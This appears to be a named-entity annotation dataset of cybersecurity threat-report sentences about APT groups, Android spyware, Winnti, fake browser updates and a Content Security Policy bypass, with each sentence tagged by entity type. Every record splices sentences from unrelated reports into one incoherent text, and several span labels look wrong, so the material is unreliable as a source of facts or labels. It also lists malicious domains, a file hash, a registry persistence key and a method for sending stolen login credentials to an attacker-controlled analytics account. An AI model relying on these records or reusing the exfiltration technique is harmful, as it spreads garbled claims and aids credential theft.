aoldaily.com aunewsonline.com canadatvsite.com canoedaily.com cnndaily.com cnndaily.net cnnnewsdaily.com defenceonline.net freshreaders.net giftnews.org reutersnewsonline.com rssadvanced.org saltlakenews.org sportreadok.net todayusa.org usapappers.com usnewssite.com yahoodaily.com . Our gathered field data shows the following statistics on CSP usage across the Internet ( based on HTTPArchive March 2020 scan ):", "spans": [{"start": 139, "end": 146, "label": "Organization"}, {"start": 281, "end": 293, "label": "Indicator"}, {"start": 294, "end": 310, "label": "Indicator"}, {"start": 311, "end": 327, "label": "Indicator"}, {"start": 328, "end": 342, "label": "Indicator"}, {"start": 343, "end": 355, "label": "Indicator"}, {"start": 356, "end": 368, "label": "Indicator"}, {"start": 369, "end": 385, "label": "Indicator"}, {"start": 386, "end": 403, "label": "Indicator"}, {"start": 404, "end": 420, "label": "Indicator"}, {"start": 421, "end": 433, "label": "Indicator"}, {"start": 434, "end": 455, "label": "Indicator"}, {"start": 456, "end": 471, "label": "Indicator"}, {"start": 472, "end": 488, "label": "Indicator"}, {"start": 489, "end": 504, "label": "Indicator"}, {"start": 505, "end": 517, "label": "Indicator"}, {"start": 518, "end": 532, "label": "Indicator"}, {"start": 533, "end": 547, "label": "Indicator"}, {"start": 548, "end": 562, "label": "Indicator"}, {"start": 623, "end": 626, "label": "System"}, {"start": 644, "end": 652, "label": "System"}, {"start": 664, "end": 675, "label": "System"}]} {"text": "We sourced the over 561MB of exfiltrated data from this domain alone , all of which we found to be 7z compressed and password protected . \" IRIDIUM has hit more than 200 government agencies , oil and gas companies and technology companies , including Citrix Systems Inc \" , they said . 
The technology-themed zones reference well-known technology companies ( AOL , Apple , Google , Microsoft ) , antivirus vendors ( McAfee , Symantec ) , and products ( Blackberry , Bluecoat ) . Looking at the top 3 M domains , only 210 K use CSP .", "spans": [{"start": 170, "end": 189, "label": "Organization"}, {"start": 192, "end": 195, "label": "Organization"}, {"start": 200, "end": 213, "label": "Organization"}, {"start": 218, "end": 238, "label": "Organization"}, {"start": 251, "end": 269, "label": "Organization"}, {"start": 358, "end": 361, "label": "Organization"}, {"start": 364, "end": 369, "label": "Organization"}, {"start": 372, "end": 378, "label": "Organization"}, {"start": 381, "end": 390, "label": "Organization"}, {"start": 415, "end": 421, "label": "Organization"}, {"start": 424, "end": 432, "label": "Organization"}, {"start": 452, "end": 462, "label": "Organization"}, {"start": 465, "end": 473, "label": "Organization"}, {"start": 526, "end": 529, "label": "System"}]} {"text": "Password generation for compressed files takes place client-side with each device using a unique key in most scenarios . Citrix told Threatpost that this is indeed the same password-spraying attack it announced itself last week \u2013 but it wouldn't confirm the other details in Resecurity 's post , including the attribution . APT1 also used more generic names referencing topics like software : Most do n\u2019t even do much besides Since the most common allowed domain is google-analytics.com ( 17 K websites )", "spans": [{"start": 121, "end": 127, "label": "Organization"}, {"start": 275, "end": 285, "label": "Organization"}, {"start": 324, "end": 328, "label": "Organization"}, {"start": 466, "end": 486, "label": "Indicator"}]} {"text": "Key information consists of an MD5 hash of the device 's Android ID , the device manufacturer , and the device model with each separated by an underscore . 
In wake of these events , a security firm Resecurity reached out to NBC news and claimed that they had reasons to believe that the attacks were carried out by Iranian-linked group known as IRIDIUM . globalowa.com gmailboxes.com hugesoft.org idirectech.com ifexcel.com infosupports.com livemymsn.com mcafeepaying.com microsoft-update-info.com micyuisyahooapis.com msnhome.org pcclubddk.net progammerli.com softsolutionbox.net symanteconline.net webservicesupdate.com . We took google - analytics as an example , but other services can also be used .", "spans": [{"start": 57, "end": 64, "label": "System"}, {"start": 184, "end": 197, "label": "Organization"}, {"start": 198, "end": 208, "label": "Organization"}, {"start": 355, "end": 368, "label": "Indicator"}, {"start": 369, "end": 383, "label": "Indicator"}, {"start": 384, "end": 396, "label": "Indicator"}, {"start": 397, "end": 411, "label": "Indicator"}, {"start": 412, "end": 423, "label": "Indicator"}, {"start": 424, "end": 440, "label": "Indicator"}, {"start": 441, "end": 454, "label": "Indicator"}, {"start": 455, "end": 471, "label": "Indicator"}, {"start": 472, "end": 497, "label": "Indicator"}, {"start": 498, "end": 518, "label": "Indicator"}, {"start": 519, "end": 530, "label": "Indicator"}, {"start": 531, "end": 544, "label": "Indicator"}, {"start": 545, "end": 560, "label": "Indicator"}, {"start": 561, "end": 580, "label": "Indicator"}, {"start": 581, "end": 599, "label": "Indicator"}, {"start": 600, "end": 621, "label": "Indicator"}, {"start": 632, "end": 650, "label": "System"}]} {"text": "Visually , this can be represented as follows : Android ID When combined with our analysis of indexed directories on C2 infrastructure , we were able to easily automate the generation of the password used by each device and , in turn , successfully decompress all exfiltrated content from compromised devices . 
Resecurity says that IRIDIUM \" has hit more than 200 government agencies , oil and gas companies , and technology companies including Citrix . Finally , some zones used by APT1 reflect a business theme . As an example , we took the twitter login page , which implemented the following CSP rule ( which contains ): The following short JS code inserted into the site will send the credentials to google - analytics console controlled by us : The UA-#######- # parameter is the tag ID owner that Google Analytics uses to connect the data to a specific account .", "spans": [{"start": 48, "end": 55, "label": "System"}, {"start": 311, "end": 321, "label": "Organization"}, {"start": 364, "end": 383, "label": "Organization"}, {"start": 386, "end": 389, "label": "Organization"}, {"start": 394, "end": 407, "label": "Organization"}, {"start": 414, "end": 434, "label": "Organization"}, {"start": 445, "end": 451, "label": "Organization"}, {"start": 483, "end": 487, "label": "Organization"}, {"start": 596, "end": 599, "label": "System"}, {"start": 804, "end": 820, "label": "System"}]} {"text": "Indexed directories on C2 infrastructure While exfiltrated content is encrypted , information used to generate the password is plainly visible in the top level directories for each device . Resecurity claims that IRIDIUM breached Citrix 's network during December 2018 . The names suggest websites that professionals might visit : Instead of using twitter \u2019s google - analytic account , we used an account we control .", "spans": [{"start": 190, "end": 200, "label": "Organization"}, {"start": 230, "end": 236, "label": "Organization"}, {"start": 348, "end": 384, "label": "System"}]} {"text": "Taking this information from directory listings , like the one shown above , allowed for the decryption of all content . 
Infy engaged in malware spearphishing against the same targets as Flying Kitten from the outset of its campaign ; Operation Cleaver has registered several resources related to development agencies that have been the subject of intrusion attempts by others since February 2014 . advanbusiness.com businessconsults.net businessformars.com companyinfosite.com conferencesinfo.com copporationnews.com . Unfortunately , the CSP policy ca n\u2019t discriminate based on the Tag ID .", "spans": [{"start": 121, "end": 125, "label": "System"}, {"start": 297, "end": 317, "label": "Organization"}, {"start": 399, "end": 416, "label": "Indicator"}, {"start": 417, "end": 437, "label": "Indicator"}, {"start": 438, "end": 457, "label": "Indicator"}, {"start": 458, "end": 477, "label": "Indicator"}, {"start": 478, "end": 497, "label": "Indicator"}, {"start": 498, "end": 517, "label": "Indicator"}, {"start": 540, "end": 543, "label": "System"}]} {"text": "In this case , FrozenCell has primarily netted the actors behind it with recorded outbound calls followed closely by images and recorded incoming calls . The malicious samples we found are the early stage malware most often delivered by spear-phishing e-mails . APT1 intruders often use the FQDNs that are associated with legitimate websites hosted by their hop points . Though Google meant to have this parameter be used to mention the page the user visited , we used it to exfiltrate the user name and password data encoded in base64 .", "spans": [{"start": 15, "end": 25, "label": "Malware"}, {"start": 262, "end": 266, "label": "Organization"}, {"start": 291, "end": 296, "label": "System"}, {"start": 378, "end": 384, "label": "Organization"}, {"start": 529, "end": 535, "label": "Indicator"}]} {"text": "FrozenCell is part of a very successful , multi-platform surveillance campaign . 
This next stage library copies itself into the System32 directory of the Windows folder after the hardcoded file name \u2014 either KBDLV2.DLL or AUTO.DLL , depending on the malware sample . We consider these domains to be \u201c hijacked \u201d because they were registered by someone for a legitimate reason , but have been leveraged by APT1 for malicious purposes . In our Google Analytics platform , we will see the data as : In our demo the DP will result in page view of Which will be decoded from base64 as : The source of the problem is that the CSP rule system is n\u2019t granular enough .", "spans": [{"start": 0, "end": 10, "label": "Malware"}, {"start": 208, "end": 218, "label": "Malware"}, {"start": 222, "end": 230, "label": "Malware"}, {"start": 405, "end": 409, "label": "Organization"}, {"start": 442, "end": 467, "label": "System"}, {"start": 570, "end": 576, "label": "Indicator"}, {"start": 620, "end": 635, "label": "System"}]} {"text": "Attackers are growing smarter , targeting individuals through the devices and the services they use most . At this stage , the malware gathers information about the infected computer . APT1 uses hijacked FQDNs for two main purposes . Recognizing and stopping the above malicious JavaScript request requires advanced visibility solutions that can detect the access and exfiltration of sensitive user data ( in this case the user \u2019s email address and password ) .", "spans": [{"start": 135, "end": 154, "label": "Malware"}, {"start": 185, "end": 189, "label": "Organization"}, {"start": 204, "end": 209, "label": "System"}]} {"text": "Government agencies and enterprises should plan to be hit from all angles - cloud services , mobile devices , laptops - in order to build comprehensive security strategies that work . Hancom Office is widely used in South Korea . 
First , they place malware ( usually in ZIP files ) on the legitimate websites hosted on the hop point and then send spear phishing emails with a link that includes the legitimate FQDN . One might think we could have updated the CSP to only allow specific TIDs : .", "spans": [{"start": 270, "end": 273, "label": "System"}, {"start": 362, "end": 368, "label": "System"}, {"start": 410, "end": 414, "label": "System"}, {"start": 459, "end": 462, "label": "System"}]} {"text": "TUESDAY , MAY 19 , 2020 The wolf is back ... NEWS SUMMARY Thai Android devices and users are being targeted by a modified version of DenDroid we are calling \" WolfRAT , '' now targeting messaging apps like WhatsApp , Facebook Messenger and Line . Perhaps it also points to the suspected North Korean origin of attack . APT12 . The problem is that CSP does n't support query strings ( See Spec ):", "spans": [{"start": 63, "end": 70, "label": "System"}, {"start": 133, "end": 141, "label": "Malware"}, {"start": 159, "end": 166, "label": "Malware"}, {"start": 206, "end": 214, "label": "System"}, {"start": 217, "end": 235, "label": "System"}, {"start": 240, "end": 244, "label": "System"}, {"start": 319, "end": 324, "label": "Organization"}, {"start": 347, "end": 350, "label": "System"}]} {"text": "We assess with high confidence that this modified version is operated by the infamous Wolf Research . The attacker is from North Korea . This research paper will delve into another prominent group of attackers referred to as \u201c IXESHE \u201d ( pronounced \u201c i-sushi \u201d ) , based on one of the more common detection names security companies use for the malware they utilize . 
Having such a gap with the most commonly used domain allowed with CSP is a major risk indicator of the threats that can come from other domains that are used to serve multiple accounts .", "spans": [{"start": 86, "end": 99, "label": "Organization"}, {"start": 227, "end": 233, "label": "Organization"}, {"start": 433, "end": 436, "label": "System"}, {"start": 437, "end": 551, "label": "Indicator"}]} {"text": "This actor has shown a surprising level of amateur actions , including code overlaps , open-source project copy/paste , classes never being instanced , unstable packages and unsecured panels . All of them lie in ranges of the Jilin Province Network and Liaoning Province Network , in China . This campaign is notable for targeting East Asian governments , electronics manufacturers , and a telecommunications company . A possible solution would come from adaptive URLs , adding the ID as part of the URL or subdomain to allow admins to set CSP rules that restrict data exfiltration to other accounts .", "spans": []} {"text": "EXECUTIVE SUMMARY Cisco Talos has discovered a new Android malware based on a leak of the DenDroid malware family . Finally , this geo-location supports the likely theory that the attackers behind Kimsuky are based in North Korea . The IXESHE campaign makes use of targeted emails with malicious attachments to compromise victims \u2019 systems . 
A more granular future direction for strengthening CSP direction to consider as part of the CSP standard is XHR proxy enforcement .", "spans": [{"start": 18, "end": 29, "label": "Organization"}, {"start": 90, "end": 98, "label": "Malware"}, {"start": 197, "end": 204, "label": "Organization"}, {"start": 236, "end": 242, "label": "Organization"}, {"start": 274, "end": 280, "label": "System"}]} {"text": "We named this malware \" WolfRAT '' due to strong links between this malware ( and the command and control ( C2 ) infrastructure ) and Wolf Research , an infamous organization that developed interception and espionage-based malware and was publicly described by CSIS during Virus Bulletin 2018 . In this blog , we look at the Winnti malware implant as used by two known activity groups BARIUM and LEAD . The emails are often tailored for specific victims and contain malicious attachments that are almost always \u201c weaponized \u201d .PDF files with known exploits that drop malware executables onto targeted systems . This will essentially create a client - side WAF that can enforce a policy on where specific data field are allowed to be transmitted .", "spans": [{"start": 24, "end": 31, "label": "Malware"}, {"start": 134, "end": 147, "label": "Organization"}, {"start": 325, "end": 339, "label": "System"}, {"start": 385, "end": 391, "label": "Organization"}, {"start": 407, "end": 413, "label": "System"}, {"start": 526, "end": 530, "label": "Indicator"}]} {"text": "We identified infrastructure overlaps and string references to previous Wolf Research work . According to the German press , the intruders used the Winnti family of malware as their main implant , giving them persistent access to the conglomerate 's network as early as February 2016 . In addition , the IXESHE attackers conducted two specific attacks that leveraged zero-day exploits\u2014one in 2009 and another in 2011 . 
In addition to the complexity of managing CSP rules , this vulnerability shows how widely used services such as Google Analytics can be subverted to bypass this protection .", "spans": [{"start": 72, "end": 85, "label": "Organization"}, {"start": 148, "end": 172, "label": "System"}, {"start": 304, "end": 310, "label": "Organization"}, {"start": 367, "end": 375, "label": "Vulnerability"}, {"start": 434, "end": 470, "label": "Vulnerability"}, {"start": 478, "end": 491, "label": "Vulnerability"}, {"start": 531, "end": 547, "label": "System"}]} {"text": "The organization appears to be shut down , but the threat actors are still very active . In the case of this malware , the activity groups strongly associated with Winnti are BARIUM and LEAD . The IXESHE attackers almost always make use of compromised servers as command-and-control ( C&C ) servers . Over 5 years ago , we began tracking a new campaign that we called FakeUpdates ( also known as SocGholish ) that used compromised websites to trick users into running a fake browser update .", "spans": [{"start": 164, "end": 170, "label": "System"}, {"start": 175, "end": 181, "label": "System"}, {"start": 186, "end": 190, "label": "System"}, {"start": 197, "end": 203, "label": "Organization"}, {"start": 263, "end": 282, "label": "System"}, {"start": 285, "end": 288, "label": "System"}, {"start": 344, "end": 352, "label": "Organization"}, {"start": 368, "end": 379, "label": "Malware"}, {"start": 396, "end": 406, "label": "Malware"}]} {"text": "We identified campaigns targeting Thai users and their devices . But even though they share the use of Winnti , the BARIUM and LEAD activity groups are involved in very different intrusion scenarios . In some cases , the compromised servers are hosted on target organizations \u2019 networks after successful infiltration so the attackers can increase their control of the victims \u2019 infrastructure . 
Instead , victims would end up infecting their computers with the NetSupport RAT , allowing threat actors to gain remote access and deliver additional payloads .", "spans": [{"start": 103, "end": 109, "label": "System"}, {"start": 116, "end": 122, "label": "System"}, {"start": 127, "end": 131, "label": "System"}, {"start": 405, "end": 412, "label": "Organization"}, {"start": 461, "end": 475, "label": "System"}]} {"text": "Some of the C2 servers are located in Thailand . To show how this breach and similar breaches can be mitigated , we look at how Windows Defender ATP flags activities associated with BARIUM , LEAD , and other known activity groups and how it provides extensive threat intelligence about these groups . Using this approach , the attackers amassed at least 60 C&C servers over time . As we have seen over the years , SocGholish is an established player that has managed to compromise countless victims and deliver ransomware after facilitating the installation of tools like Cobalt Strike or Mimikatz .", "spans": [{"start": 128, "end": 148, "label": "Organization"}, {"start": 357, "end": 360, "label": "System"}, {"start": 414, "end": 424, "label": "Malware"}, {"start": 572, "end": 585, "label": "System"}, {"start": 589, "end": 597, "label": "System"}]} {"text": "The panels also contain Thai JavaScript comments and the domain names also contain references to Thai food , a tactic commonly employed to entice users to click/visit these C2 panels without much disruption . BARIUM begins its attacks by cultivating relationships with potential victims\u2014particularly those working in Business Development or Human Resources\u2014on various social media platforms . This technique also allows the attackers to cover their tracks , as having the C&C server in the victims \u2019 corporate networks means very little C&C traffic leaves them . 
The new campaign , which we call FakeSG , also relies on hacked WordPress websites to display a custom landing page mimicking the victim 's browser .", "spans": [{"start": 368, "end": 380, "label": "Organization"}, {"start": 472, "end": 475, "label": "System"}, {"start": 537, "end": 540, "label": "System"}, {"start": 571, "end": 579, "label": "Organization"}, {"start": 596, "end": 602, "label": "Malware"}, {"start": 620, "end": 645, "label": "System"}]} {"text": "We identified a notable lack of sophistication in this investigation such as copy/paste , unstable code , dead code and panels that are freely open . During these intrusions , LEAD 's objective was to steal sensitive data , including research materials , process documents , and project plans . The attackers \u2019 deliberate use of compromised machines and dynamic Domain Name System ( DNS ) services allows them to hide traces of their presence by confusing their activities with data belonging to legitimate individuals . The threat actors are distributing NetSupport RAT either as a zipped download or via an Internet shortcut .", "spans": [{"start": 362, "end": 380, "label": "Indicator"}, {"start": 383, "end": 386, "label": "Indicator"}, {"start": 525, "end": 538, "label": "Organization"}, {"start": 556, "end": 570, "label": "System"}]} {"text": "What 's new ? Initial intrusion stages feature the Win32/Barlaiy implant\u2014notable for its use of social network profiles , collaborative document editing sites , and blogs for C&C . Looking at threat intelligence derived from tracking APT campaigns over time primarily based on the network traffic generated by the malware used , we were able to develop indicators of compromise for the IXESHE campaign . 
While FakeSG appears to be a newcomer , it uses different layers of obfuscation and delivery techniques that make it a threat to take seriously and which could potentially rival with SocGholish .", "spans": [{"start": 51, "end": 64, "label": "System"}, {"start": 89, "end": 119, "label": "Malware"}, {"start": 122, "end": 158, "label": "Malware"}, {"start": 165, "end": 178, "label": "Malware"}, {"start": 386, "end": 392, "label": "Organization"}, {"start": 410, "end": 416, "label": "Malware"}, {"start": 587, "end": 597, "label": "Malware"}]} {"text": "WolfRAT is based on a previously leaked malware named DenDroid . Once BARIUM has established rapport , they spear-phish the victim using a variety of unsophisticated malware installation vectors , including malicious shortcut ( .lnk ) files with hidden payloads , compiled HTML help ( .chm ) files , or Microsoft Office documents containing macros or exploits . The malware samples used in this campaign were not very complicated by nature but do give the attackers almost complete control over their targets \u2019 compromised systems . We first heard of this new campaign thanks to a Mastodon post by Randy McEoin .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 54, "end": 62, "label": "Malware"}, {"start": 150, "end": 173, "label": "System"}, {"start": 207, "end": 225, "label": "System"}, {"start": 228, "end": 232, "label": "Malware"}, {"start": 273, "end": 297, "label": "System"}, {"start": 303, "end": 329, "label": "System"}, {"start": 560, "end": 568, "label": "Organization"}, {"start": 581, "end": 589, "label": "Organization"}, {"start": 598, "end": 610, "label": "Organization"}]} {"text": "The new malware appears to be linked to the infamous Wolf Research organization and targets Android devices located in Thailand . Instead , the group often simply emails a Winnti installer to potential victims , relying on basic social engineering tactics to convince recipients to run the attached malware . 
Most of the IP addresses of IXESHE \u2019s victims are linked to DSL networks , which made it difficult to determine their identities . The tactics , techniques and procedures ( TTPs ) are very similar to those of SocGholish and it would be easy to think the two are related .", "spans": [{"start": 53, "end": 66, "label": "Organization"}, {"start": 92, "end": 99, "label": "System"}, {"start": 172, "end": 188, "label": "System"}, {"start": 337, "end": 343, "label": "Organization"}, {"start": 369, "end": 372, "label": "System"}, {"start": 518, "end": 528, "label": "Malware"}]} {"text": "How did it work ? Microsoft Analytics shows that Winnti has been used in intrusions carried out throughout Asia , Europe , Oceania , the Middle East , and the United States in the last six months ( Figure 1 ) . Careful research , however , allowed the identification of some of the attackers \u2019 victims : East Asian governments , Taiwanese electronics manufacturers , A telecommunications company . In fact , this chain also leads to NetSupport RAT .", "spans": [{"start": 18, "end": 37, "label": "Organization"}, {"start": 49, "end": 55, "label": "System"}, {"start": 433, "end": 447, "label": "System"}]} {"text": "The malware mimics legit services such as Google service , GooglePlay or Flash update . Instead , Lead often simply emails a Winnti installer to potential victims , relying on basic social engineering tactics to convince recipients to run the attached malware . Campaign victims were identified by using Whois records and open source research . 
As a result , we decided to call this variant FakeSG .", "spans": [{"start": 42, "end": 48, "label": "Organization"}, {"start": 59, "end": 69, "label": "System"}, {"start": 73, "end": 78, "label": "System"}, {"start": 125, "end": 141, "label": "System"}, {"start": 304, "end": 309, "label": "System"}, {"start": 391, "end": 397, "label": "Malware"}]} {"text": "The malware is not really advanced and is based on a lot of copy/paste from public sources available on the Internet . In some other cases , LEAD gains access to a target by brute-forcing remote access login credentials , performing SQL injection , or exploiting unpatched web servers , and then they copy the Winnti installer directly to compromised machines . Trend Micro generally notifies customers that are believed to have been specifically targeted by APT campaigns . 2023 - 07 - 19 Update : On June 5 , @SecurityAura described an unknown campaign using .hta payloads disguised as driver updates .", "spans": [{"start": 310, "end": 326, "label": "System"}, {"start": 362, "end": 373, "label": "Organization"}, {"start": 511, "end": 524, "label": "Organization"}]} {"text": "The C2 infrastructure contains a lack of sophistication such as open panels , reuse of old servers publicly tagged as malicious\u2026 So what ? This was the case in two known intrusions in 2015 , where attackers named the implant DLL \" ASPNET_FILTER.DLL \" to disguise it as the DLL for the ASP.NET ISAPI Filter . The IXESHE attackers have been actively launching highly targeted attacks since at least July 2009 . 
On June 22 , @AnFam17 spotted the same fake browser update leveraging URL shortcuts .", "spans": [{"start": 231, "end": 248, "label": "Malware"}, {"start": 285, "end": 305, "label": "Malware"}, {"start": 312, "end": 318, "label": "Organization"}, {"start": 422, "end": 430, "label": "Organization"}]} {"text": "After being publicly denounced by CSIS Group \u2014 a threat intelligence company in Denmark \u2014 Wolf Research was closed and a new organization named LokD was created . Windows Defender ATP helps network security professionals deal with intrusions from activity groups like LEAD and BARIUM in several ways . Available data on the IXESHE campaign indicates that targeted emails with malicious .PDF file attachments were the attackers \u2019 vector of choice . Both of these campaigns use a similar structure with compromised WordPress sites hosting the lure shortcuts and a WebDav server that loads NetSupport RAT .", "spans": [{"start": 34, "end": 44, "label": "Organization"}, {"start": 90, "end": 103, "label": "Organization"}, {"start": 144, "end": 148, "label": "Organization"}, {"start": 163, "end": 183, "label": "Organization"}, {"start": 268, "end": 272, "label": "System"}, {"start": 277, "end": 283, "label": "System"}, {"start": 324, "end": 330, "label": "Organization"}, {"start": 364, "end": 370, "label": "System"}, {"start": 386, "end": 390, "label": "Indicator"}, {"start": 513, "end": 528, "label": "System"}, {"start": 562, "end": 575, "label": "System"}]} {"text": "This new organization seems to work on securing Android devices . The following examples were developed using a Winnti installer that was used in attacks in December 2016 . In most cases , the attacks involved Adobe Acrobat , Reader , and Flash Player exploits such as : CVE-2009-4324 , CVE-2009-0927 , CVE-2011-0609 , CVE-2011-0611 . 
RussianPanda ( @AnFam17 ) named the URL shortcut campaign RogueRaticate .", "spans": [{"start": 48, "end": 55, "label": "Organization"}, {"start": 112, "end": 128, "label": "System"}, {"start": 210, "end": 223, "label": "System"}, {"start": 226, "end": 232, "label": "System"}, {"start": 239, "end": 251, "label": "System"}, {"start": 271, "end": 284, "label": "Vulnerability"}, {"start": 287, "end": 300, "label": "Vulnerability"}, {"start": 303, "end": 316, "label": "Vulnerability"}, {"start": 319, "end": 332, "label": "Vulnerability"}, {"start": 335, "end": 347, "label": "Organization"}, {"start": 393, "end": 406, "label": "Malware"}]} {"text": "However , thanks to the infrastructure sharing and forgotten panel names , we assess with high confidence that this actor is still active , it is still developing malware and has been using it from mid-June to today . The Windows 10 Creators Update will bring several enhancements to Windows Defender ATP that will provide SOC personnel with options for immediate mitigation of a detected threat . It should also be noted that this campaign used CVE-2009-4324 and CVE-2011-0609 exploits when these were still unpatched or considered zero-day vulnerabilities . FakeSG has different browser templates depending on which browser the victim is running .", "spans": [{"start": 222, "end": 248, "label": "System"}, {"start": 254, "end": 280, "label": "Malware"}, {"start": 284, "end": 304, "label": "Organization"}, {"start": 323, "end": 336, "label": "Organization"}, {"start": 446, "end": 459, "label": "Vulnerability"}, {"start": 464, "end": 477, "label": "Vulnerability"}, {"start": 533, "end": 541, "label": "Vulnerability"}, {"start": 560, "end": 566, "label": "Malware"}]} {"text": "On the C2 panel , we found a potential link between Wolf Research and another Cyprus organization named Coralco Tech . 
LEAD and BARIUM are not known for large-scale spear-phishing , so it is unlikely that SOC personnel would have to deal with multiple machines having been compromised by these groups at the same time . The IXESHE attackers also used an exploit that affected Microsoft Excel \u2014 CVE-2009-3129 . The themed \" updates \" look very professional and are more up to date than its SocGholish counterpart .", "spans": [{"start": 52, "end": 65, "label": "Organization"}, {"start": 104, "end": 116, "label": "Organization"}, {"start": 205, "end": 218, "label": "Organization"}, {"start": 324, "end": 330, "label": "Organization"}, {"start": 376, "end": 385, "label": "Organization"}, {"start": 386, "end": 391, "label": "System"}, {"start": 394, "end": 407, "label": "Vulnerability"}, {"start": 489, "end": 499, "label": "Malware"}]} {"text": "This organization is also working on interception technology . And , finally , with the upcoming Creators Update , Windows Defender ATP will provide additional capabilities for detecting threats such as Winnti , as well as centralized response options , such as machine isolation and file blocking , that will enable fast containment of known attack jump off points . Every IXESHE case we examined revealed that the original infection vector was a targeted email with a PDF exploit as attachment . 
Compromised websites ( WordPress appears to be the top target ) are injected with a code snippet that replaces the current webpage with the aforementioned fake updates templates .", "spans": [{"start": 97, "end": 112, "label": "System"}, {"start": 115, "end": 135, "label": "Organization"}, {"start": 374, "end": 380, "label": "Organization"}, {"start": 457, "end": 462, "label": "System"}, {"start": 470, "end": 473, "label": "System"}, {"start": 498, "end": 518, "label": "System"}, {"start": 521, "end": 530, "label": "Organization"}]} {"text": "LINKS TO WOLF INTELLIGENCE During the Virus Bulletin conference in 2018 , CSIS researchers Beno\u00eet Ancel and Aleksejs Kuprins did a presentation on Wolf Research and the offensive arsenal developed by the organization . The police suspected Lurk of stealing nearly three billion rubles , using malicious software to systematically withdraw large sums of money from the accounts of commercial organizations , including banks . Older versions also used an XLS exploit . The source code is loaded from one of several domains impersonating Google ( google - analytiks[.]com ) or Adobe ( updateadobeflash[.]website ): That code contains all the web elements ( images , fonts , text ) needed to render the fake browser update page .", "spans": [{"start": 74, "end": 78, "label": "Organization"}, {"start": 147, "end": 160, "label": "Organization"}, {"start": 240, "end": 244, "label": "System"}, {"start": 380, "end": 404, "label": "Organization"}, {"start": 417, "end": 422, "label": "Organization"}, {"start": 453, "end": 456, "label": "System"}, {"start": 535, "end": 541, "label": "System"}, {"start": 574, "end": 579, "label": "System"}]} {"text": "They mentioned an Android , iOS and Windows remote access tool ( RAT ) . When we first encountered Lurk , in 2011 , it was a nameless Trojan . Opening the .PDF file drops and executes a malware in a victim \u2019s system . 
We should note that SocGholish used to retrieve media files from separate web requests until more recently when it started using self - contained Base64 encoded images .", "spans": [{"start": 18, "end": 25, "label": "System"}, {"start": 28, "end": 31, "label": "System"}, {"start": 36, "end": 43, "label": "System"}, {"start": 99, "end": 103, "label": "System"}, {"start": 155, "end": 159, "label": "Indicator"}, {"start": 238, "end": 248, "label": "Malware"}]} {"text": "Their findings showed that Wolf is headquartered in Germany with offices in Cyprus , Bulgaria , Romania , India and ( possibly ) the U.S . While the machine is in isolation , SOC personnel can direct the infected machine to collect live investigation data , such as the DNS cache or security event logs , which they can use to verify alerts , assess the state of the intrusion , and support follow-up actions . The malware displays a blank .PDF file or a decoy document related to the targeted attack . There are different installation flows for this campaign , but we will focus on the one that uses a URL shortcut .", "spans": [{"start": 175, "end": 188, "label": "Organization"}, {"start": 551, "end": 559, "label": "Organization"}]} {"text": "The organization was closed after the CSIS presentation . This article is an attempt to share this experience with other experts , particularly the IT security specialists in companies and financial institutions that increasingly find themselves the targets of cyber-attacks . The emails normally come from compromised personal accounts or are entirely spoofed . 
This shortcut uses the WebDav HTTP protocol extension to retrieve the file launcher-upd.hta from a remote server : This heavily obfuscated script is responsible for the execution of PowerShell that downloads the final malware payload ( NetSupport RAT ) .", "spans": [{"start": 38, "end": 42, "label": "Organization"}, {"start": 148, "end": 150, "label": "Organization"}, {"start": 189, "end": 211, "label": "Organization"}, {"start": 281, "end": 287, "label": "System"}, {"start": 478, "end": 596, "label": "Malware"}, {"start": 599, "end": 613, "label": "Malware"}]} {"text": "However , the director created a new organization in Cyprus named LokD . In most cases , the attackers only had to infect the computer on which the RBS software was installed in order to start stealing the cash . emails from spoofed senders were usually sent via mail servers in the United States and China . Malwarebytes 's EDR shows the full attack chain ( please click to enlarge ): The NetSupport RAT files are hosted on the same compromised WordPress site used earlier to download the Internet shortcut .", "spans": [{"start": 66, "end": 70, "label": "Organization"}, {"start": 213, "end": 219, "label": "System"}, {"start": 309, "end": 324, "label": "Organization"}, {"start": 390, "end": 404, "label": "Malware"}]} {"text": "This new organization proposed the creation of a more secure Android phone . We were soon able to help investigate another incident involving Lurk . The malware also sets the executable file \u2019s attributes to \u201c Hidden. \u201d Some of the file names the attackers used include : winhlps.exe , acrotry.exe , AcroRd32.exe , Updater.exe . 
The RAT 's main binary is launched from \" C:\\Users\\%username%\\AppData\\Roaming\\BranScale\\client32.exe \" .", "spans": [{"start": 61, "end": 68, "label": "System"}, {"start": 142, "end": 146, "label": "System"}, {"start": 272, "end": 283, "label": "Indicator"}, {"start": 286, "end": 297, "label": "Indicator"}, {"start": 300, "end": 312, "label": "Indicator"}, {"start": 315, "end": 326, "label": "Indicator"}]} {"text": "Based on the organization website , it also proposes services and developed zero-day vulnerabilities to test their own products : Zero-day research from lokd.com We can see that the organization owner still has an interest in Android devices . This event significantly affected the Russian cybercriminal world as the gang had stolen hundreds of millions of rubles during a few years of activity , and was considered a \" leader \" among cybercriminals . In order for the malware to survive rebooting , it normally creates the following registry run key : HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run . Fake browser updates are a very common decoy used by malware authors .", "spans": [{"start": 76, "end": 100, "label": "Vulnerability"}, {"start": 153, "end": 161, "label": "Organization"}, {"start": 226, "end": 233, "label": "System"}]} {"text": "Based on infrastructure overlaps and leaked information , we assess with high confidence that the malware we identified and present in this paper is linked to Wolf Research . In Russia , there were several relatively large cybercriminal groups engaged in financial theft via attacks on RBS . The registry run key , in turn , points to the malware that has been dropped . 
In addition to SocGholish , the Domen toolkit was a well - built framework that emerged in 2019 while another campaign known as sczriptzzbn dropped SolarMarker leading to the NetSupport RAT in both cases .", "spans": [{"start": 159, "end": 172, "label": "Organization"}, {"start": 386, "end": 396, "label": "Malware"}, {"start": 403, "end": 416, "label": "Malware"}, {"start": 499, "end": 510, "label": "Malware"}, {"start": 519, "end": 530, "label": "Malware"}, {"start": 546, "end": 560, "label": "Malware"}]} {"text": "One of the samples ( e19823a1ba4a0e40cf459f4a0489fc257720cc0d71ecfb7ad94b3ca86fbd85d1 ) uses the C2 server svcws [ . In April 2013 , a year after we found the \" bodiless \" Lurk module , the Russian cybercriminal underground exploited several families of malicious software that specialized in attacks on banking software . The value name of this entry varies from sample to sample . Initial access brokers use tools like NetSupport RAT to gather information and perform additional actions on victims of interest .", "spans": [{"start": 21, "end": 85, "label": "Indicator"}, {"start": 107, "end": 116, "label": "Indicator"}, {"start": 172, "end": 183, "label": "System"}, {"start": 421, "end": 435, "label": "System"}]} {"text": "] ponethus 